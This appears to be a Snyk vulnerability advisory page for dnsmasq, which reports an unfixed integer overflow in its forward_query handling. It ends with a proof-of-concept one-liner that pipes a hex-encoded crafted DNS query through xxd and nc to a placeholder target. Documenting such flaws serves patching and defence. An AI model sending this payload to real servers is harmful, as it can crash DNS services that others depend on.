Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for dnsmasq
.
Affected versions of this package are vulnerable to Integer Overflow via the forward_query
process. An attacker can manipulate memory allocation and potentially cause a program crash or incorrect data processing by sending specially crafted queries.
echo -n 'c97b01000001000000000000047465737403636f6d0000020001' | xxd
-r -p | nc -u target_addr target_port